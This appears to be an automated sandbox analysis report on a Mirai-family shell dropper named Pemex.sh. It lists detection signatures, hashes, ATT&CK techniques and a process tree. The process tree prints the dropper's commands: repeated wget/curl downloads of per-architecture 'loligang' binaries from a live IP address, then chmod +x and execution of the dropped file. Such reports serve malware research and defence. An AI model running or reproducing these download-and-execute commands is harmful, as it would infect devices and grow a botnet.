Analysis
-
max time kernel
114s -
max time network
160s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
23-12-2024 06:19
Static task
static1
Behavioral task
behavioral1
Sample
Pemex.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
Pemex.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
Pemex.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
Pemex.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
Pemex.sh
-
Size
1KB
-
MD5
e18ba04d72384ac85e6117c774f6d4f9
-
SHA1
6cb8e9a2da2db042da0875a08f43cc867b8a2c5b
-
SHA256
289876bf62e9a2a364da63cceb9a865c84792377a700afb676811ee53113919e
-
SHA512
3e69c0fdb07347f2dcd8d3b3d9514d392a572173afec60fd702180cf3f7d5d21bca67dff2cb022641c7f0a2df4b817f1589a6a1599726ddeea67ba5c768e954d
Malware Config
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Signatures
-
Mirai family
-
Contacts a large (63573) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 793 chmod 799 chmod 823 chmod 836 chmod 852 chmod 715 chmod 780 chmod 804 chmod 755 chmod 786 chmod -
Executes dropped EXE 10 IoCs
ioc pid Process /tmp/awoo 716 awoo /tmp/awoo 757 awoo /tmp/awoo 781 awoo /tmp/awoo 787 awoo /tmp/awoo 794 awoo /tmp/awoo 800 awoo /tmp/awoo 805 awoo /tmp/awoo 824 awoo /tmp/awoo 837 awoo /tmp/awoo 853 awoo -
Modifies Watchdog functionality 1 TTPs 8 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog awoo File opened for modification /dev/misc/watchdog awoo File opened for modification /dev/watchdog awoo File opened for modification /dev/misc/watchdog awoo File opened for modification /dev/watchdog awoo File opened for modification /dev/misc/watchdog awoo File opened for modification /dev/watchdog awoo File opened for modification /dev/misc/watchdog awoo -
Enumerates active TCP sockets 1 TTPs 4 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo -
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 10 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Reads system network configuration 1 TTPs 4 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo -
description ioc Process File opened for reading /proc/844/fd awoo File opened for reading /proc/328/fd awoo File opened for reading /proc/660/fd awoo File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/598/fd awoo File opened for reading /proc/606/fd awoo File opened for reading /proc/280/fd awoo File opened for reading /proc/295/fd awoo File opened for reading /proc/self/auxv curl File opened for reading /proc/841/fd awoo File opened for reading /proc/143/fd awoo File opened for reading /proc/598/fd awoo File opened for reading /proc/660/fd awoo File opened for reading /proc/601/fd awoo File opened for reading /proc/831/fd awoo File opened for reading /proc/self/auxv curl File opened for reading /proc/316/fd awoo File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/608/fd awoo File opened for reading /proc/842/fd awoo File opened for reading /proc/281/fd awoo File opened for reading /proc/143/fd awoo File opened for reading /proc/280/fd awoo File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/283/fd awoo File opened for reading /proc/840/fd awoo File opened for reading /proc/280/fd awoo File opened for reading /proc/316/fd awoo File opened for reading /proc/281/fd awoo File opened for reading /proc/663/fd awoo File opened for reading /proc/808/fd awoo File opened for reading /proc/838/fd awoo File opened for reading /proc/857/exe awoo File opened for reading /proc/283/fd awoo File opened for reading /proc/603/fd awoo File opened for reading /proc/663/fd awoo File opened for reading /proc/1/fd awoo File opened for reading /proc/850/fd awoo File opened for reading /proc/865/exe awoo File opened for reading /proc/869/exe awoo File opened for reading /proc/796/fd awoo File opened for reading /proc/663/fd awoo File opened for reading /proc/827/fd awoo File opened for reading /proc/867/exe awoo File opened for reading /proc/829/fd awoo File opened for reading /proc/827/fd awoo File opened for reading /proc/809/fd awoo File opened for reading /proc/806/fd awoo File opened for reading /proc/847/fd awoo File opened for reading /proc/1/fd awoo File opened for reading /proc/854/fd awoo File opened for reading /proc/810/fd awoo File opened for reading /proc/283/fd awoo File opened for reading /proc/796/fd awoo File opened for reading /proc/827/fd awoo File opened for reading /proc/663/exe awoo File opened for reading /proc/self/auxv curl File opened for reading /proc/808/fd awoo File opened for reading /proc/829/fd awoo File opened for reading /proc/606/exe awoo File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/295/fd awoo File opened for reading /proc/281/fd awoo File opened for reading /proc/601/fd awoo -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 718 wget 735 curl 754 cat -
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/loligang.arm5 curl File opened for modification /tmp/loligang.x86 wget File opened for modification /tmp/loligang.mpsl curl File opened for modification /tmp/loligang.arm5 wget File opened for modification /tmp/loligang.arm6 wget File opened for modification /tmp/loligang.arm6 curl File opened for modification /tmp/loligang.sh4 curl File opened for modification /tmp/loligang.mips wget File opened for modification /tmp/loligang.mips curl File opened for modification /tmp/loligang.arm7 curl File opened for modification /tmp/loligang.ppc curl File opened for modification /tmp/loligang.m68k wget File opened for modification /tmp/loligang.m68k curl File opened for modification /tmp/loligang.x86 curl File opened for modification /tmp/awoo Pemex.sh File opened for modification /tmp/loligang.mpsl wget File opened for modification /tmp/loligang.arm4 curl File opened for modification /tmp/loligang.arm7 wget File opened for modification /tmp/loligang.ppc wget File opened for modification /tmp/loligang.sh4 wget
Processes
-
/tmp/Pemex.sh/tmp/Pemex.sh1⤵
- Writes file to tmp directory
PID:660 -
/usr/bin/wgetwget http://185.255.120.43/lmaoWTF/loligang.x862⤵
- Writes file to tmp directory
PID:662
-
-
/usr/bin/curlcurl -O http://185.255.120.43/lmaoWTF/loligang.x862⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:697
-
-
/bin/catcat loligang.x862⤵PID:713
-
-
/bin/chmodchmod +x awoo loligang.x86 Pemex.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-3ZBytL2⤵
- File and Directory Permissions Modification
PID:715
-
-
/tmp/awoo./awoo2⤵
- Executes dropped EXE
PID:716
-
-
/usr/bin/wgetwget http://185.255.120.43/lmaoWTF/loligang.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:718
-
-
/usr/bin/curlcurl -O http://185.255.120.43/lmaoWTF/loligang.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:735
-
-
/bin/catcat loligang.mips2⤵
- System Network Configuration Discovery
PID:754
-
-
/bin/chmodchmod +x awoo loligang.mips loligang.x86 Pemex.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-3ZBytL2⤵
- File and Directory Permissions Modification
PID:755
-
-
/tmp/awoo./awoo2⤵
- Executes dropped EXE
PID:757
-
-
/usr/bin/wgetwget http://185.255.120.43/lmaoWTF/loligang.mpsl2⤵
- Writes file to tmp directory
PID:759
-
-
/usr/bin/curlcurl -O http://185.255.120.43/lmaoWTF/loligang.mpsl2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:778
-
-
/bin/catcat loligang.mpsl2⤵PID:779
-
-
/bin/chmodchmod +x awoo loligang.mips loligang.mpsl loligang.x86 Pemex.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-3ZBytL2⤵
- File and Directory Permissions Modification
PID:780
-
-
/tmp/awoo./awoo2⤵
- Executes dropped EXE
PID:781
-
-
/usr/bin/wgetwget http://185.255.120.43/lmaoWTF/loligang.arm42⤵PID:783
-
-
/usr/bin/curlcurl -O http://185.255.120.43/lmaoWTF/loligang.arm42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:784
-
-
/bin/catcat loligang.arm42⤵PID:785
-
-
/bin/chmodchmod +x awoo loligang.arm4 loligang.mips loligang.mpsl loligang.x86 Pemex.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-3ZBytL2⤵
- File and Directory Permissions Modification
PID:786
-
-
/tmp/awoo./awoo2⤵
- Executes dropped EXE
PID:787
-
-
/usr/bin/wgetwget http://185.255.120.43/lmaoWTF/loligang.arm52⤵
- Writes file to tmp directory
PID:788
-
-
/usr/bin/curlcurl -O http://185.255.120.43/lmaoWTF/loligang.arm52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:789
-
-
/bin/catcat loligang.arm52⤵PID:792
-
-
/bin/chmodchmod +x awoo loligang.arm4 loligang.arm5 loligang.mips loligang.mpsl loligang.x86 Pemex.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-3ZBytL2⤵
- File and Directory Permissions Modification
PID:793
-
-
/tmp/awoo./awoo2⤵
- Executes dropped EXE
PID:794
-
-
/usr/bin/wgetwget http://185.255.120.43/lmaoWTF/loligang.arm62⤵
- Writes file to tmp directory
PID:795
-
-
/usr/bin/curlcurl -O http://185.255.120.43/lmaoWTF/loligang.arm62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:797
-
-
/bin/catcat loligang.arm62⤵PID:798
-
-
/bin/chmodchmod +x awoo loligang.arm4 loligang.arm5 loligang.arm6 loligang.mips loligang.mpsl loligang.x86 Pemex.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-3ZBytL2⤵
- File and Directory Permissions Modification
PID:799
-
-
/tmp/awoo./awoo2⤵
- Executes dropped EXE
PID:800
-
-
/usr/bin/wgetwget http://185.255.120.43/lmaoWTF/loligang.arm72⤵
- Writes file to tmp directory
PID:801
-
-
/usr/bin/curlcurl -O http://185.255.120.43/lmaoWTF/loligang.arm72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:802
-
-
/bin/catcat loligang.arm72⤵PID:803
-
-
/bin/chmodchmod +x awoo loligang.arm4 loligang.arm5 loligang.arm6 loligang.arm7 loligang.mips loligang.mpsl loligang.x86 Pemex.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-3ZBytL2⤵
- File and Directory Permissions Modification
PID:804
-
-
/tmp/awoo./awoo2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:805
-
-
/usr/bin/wgetwget http://185.255.120.43/lmaoWTF/loligang.ppc2⤵
- Writes file to tmp directory
PID:809
-
-
/usr/bin/curlcurl -O http://185.255.120.43/lmaoWTF/loligang.ppc2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:821
-
-
/bin/chmodchmod +x awoo loligang.arm4 loligang.arm5 loligang.arm6 loligang.arm7 loligang.mips loligang.mpsl loligang.ppc loligang.x86 Pemex.sh2⤵
- File and Directory Permissions Modification
PID:823
-
-
/tmp/awoo./awoo2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:824
-
-
/usr/bin/wgetwget http://185.255.120.43/lmaoWTF/loligang.m68k2⤵
- Writes file to tmp directory
PID:828
-
-
/usr/bin/curlcurl -O http://185.255.120.43/lmaoWTF/loligang.m68k2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:832
-
-
/bin/chmodchmod +x awoo loligang.arm4 loligang.arm5 loligang.arm6 loligang.arm7 loligang.m68k loligang.mips loligang.mpsl loligang.ppc loligang.x86 Pemex.sh2⤵
- File and Directory Permissions Modification
PID:836
-
-
/tmp/awoo./awoo2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:837
-
-
/usr/bin/wgetwget http://185.255.120.43/lmaoWTF/loligang.sh42⤵
- Writes file to tmp directory
PID:841
-
-
/usr/bin/curlcurl -O http://185.255.120.43/lmaoWTF/loligang.sh42⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:848
-
-
/bin/chmodchmod +x awoo loligang.arm4 loligang.arm5 loligang.arm6 loligang.arm7 loligang.m68k loligang.mips loligang.mpsl loligang.ppc loligang.sh4 loligang.x86 Pemex.sh2⤵
- File and Directory Permissions Modification
PID:852
-
-
/tmp/awoo./awoo2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:853
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
87KB
MD55f6d2539a443501c888fc90986479ee6
SHA11f1ce02f9cafc0e684559cd7e36170d6cba370dc
SHA2565775d9b48bb5c73f8e4625ee86f07e33967aecca610947654e8eea692e200137
SHA5123bd781322c46687a8d750c1129b843a2a2312b186094d5918d5d8eac8c0b04ef8ee14a6a14fb74eb557bdb6558f78301a597ee651c4ace2aa23ebe02554a7198
-
Filesize
89KB
MD59a397c973a66d7380ca64d61070b88d3
SHA1f6828d001883357d22adf948b087ca400c5498dc
SHA25667b7d4c356522d870024d4f04289dc6bcc53537209478fe43347511abb7e63fc
SHA51218c4d902787043acdc63b3640f6e405dc8f96be38fbd40664595b1c6224adddcfc7895a20417a0de140c8280dc117f3dc7e9bcbb9336b8f0eabfb9f44d7adb77
-
Filesize
219B
MD577a1be2e52dbcd8c91339552d24d4307
SHA13022d244329aed127e19ee0d417fda68f2dd3e67
SHA2564ccd015d16ad27e624cd00f668f50f22cc0657a51a32cbb852bc9b0f0d09c583
SHA512a697f281321f8fdbaee9a2e41867a233bad3c36c9fd16d7bf026736bd97c5139f19bc44283780b957985045a2aeeaca177c5cd2d8e534466eec80c255d31d9b8
-
Filesize
61KB
MD59ead78d6b3492afbfd8e8336b18046d7
SHA10b53894dd4eaed898736ab347b64f0de63b47f9d
SHA2565b8818d5ed45664d91b526b1b6ad29b24f3f9af48d9c8e4c49f44fcc12daa6ea
SHA51248ba085c4920ed0d4b2512e1f6d6b5faaf6bce09f67da8db89bbb112fb6f7e94908ea5ca91e61237e546ac0864a26a65d3b302cd3894538c2be0f4af5ecae83a
-
Filesize
141KB
MD5abde533a1866fb17c76ff1edcf5facd1
SHA121bd062bb8d518f384ed18ca0f2cef91cffbb5f8
SHA256ce83c30530762a5dc8832ea605a05d7c411c33d63465ce96cc37b7ef02d4223b
SHA512d55f6adfa3dd8b543ed972d6562c8f20cbcb0772f3b7dbc125f2dab9183c92f00feee991f75d85d33add31429f077c64e0d87bda4ab4ef18f159e7e6b116dfec
-
Filesize
64KB
MD52354f2531c0bf296738fa7733c42785f
SHA186508e4ee74c70bf226f6666bf227a12be69dcad
SHA2563d0b5252c0f8736759af8b122612395ea484794afbdeb5435769f3c164d04c93
SHA512eda30463d2e8355af4d6626815aedb78b1b5d43c4df53e4a9a72405074a22e9fd09f54e882b0c5ad5136202907a7e6e599d29d325d6e0b3188e6f8ff77abe679